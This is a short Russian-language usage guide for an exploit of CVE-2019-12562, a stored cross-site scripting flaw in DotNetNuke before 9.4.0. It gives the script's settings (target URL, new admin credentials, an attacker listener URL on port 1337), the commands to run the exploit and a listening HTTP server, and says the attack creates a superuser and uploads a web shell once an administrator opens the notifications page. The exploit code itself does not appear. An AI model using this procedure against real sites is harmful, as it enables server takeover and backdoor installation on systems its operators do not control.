
Хранимая межсайтовая скриптовка в DotNetNuke (DNN) версии до 9.4.0 | XSS в RCE
CVE-2019-12562 Межсайтовый скриптинг (XSS) с сохранением в DotNetNuke (DNN) версии до 9.4.0 позволяет удалённым злоумышленникам сохранять и внедрять вредоносный скрипт на страницу уведомлений администратора. Эксплойт может использоваться для выполнения любых действий с правами администратора, таких как управление контентом, добавление пользователей, загрузка бэкдоров на сервер и т.д. Успешная эксплуатация происходит, когда администратор посещает страницу уведомлений с сохранённым межсайтовым скриптингом.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Этот эксплойт создаст суперпользователя и загрузит веб-шелл на целевой сервер
Условие эксплуатации: успешная атака происходит, когда администратор посещает страницу уведомлений.
Подробнее: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Ссылка на CVE: https://www.cvedetails.com/cve/CVE-2019-12562/